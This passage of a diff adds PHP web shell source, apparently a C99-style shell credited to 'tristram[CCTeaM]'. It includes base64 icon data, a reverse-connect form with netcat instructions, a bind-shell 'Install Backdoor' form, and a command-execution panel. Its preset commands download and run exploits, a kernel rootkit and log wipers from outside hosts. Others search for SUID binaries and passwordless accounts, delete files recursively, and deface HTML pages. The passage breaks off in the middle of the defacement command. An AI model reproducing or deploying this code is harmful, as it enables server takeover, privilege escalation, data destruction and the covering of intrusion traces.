+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. 
+ $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! 
Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. 
Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>"); + echo("$msg"); + echo("$emsg"); +} + +if ($act == "shbd"){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST> +Bind Port: <input type='text' name='backconnectport' value='5992'> +<input type='hidden' name='use' value='shbd'> +<input type='submit' value='Install Backdoor'></form>"); +echo("$msg"); +echo("$emsg"); +echo("</center>"); +} ?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div 
align="center">Useful Commands + </div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? + <OPTION VALUE="which wget curl w3m lynx">Downloaders? + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE="locate gcc">gcc installed? + <OPTION VALUE="rm -Rf">Format box (DANGEROUS) + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) + <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 + <OPTION VALUE="./zap2">WIPELOGS PT3 + <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) + <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) + <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) + <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) + <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) + <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) + <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow + <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit + <OPTION VALUE="./sudosploit">Execute Sudosploit + <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c + <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c + <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c + <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner + 
<OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner + <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner + <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img 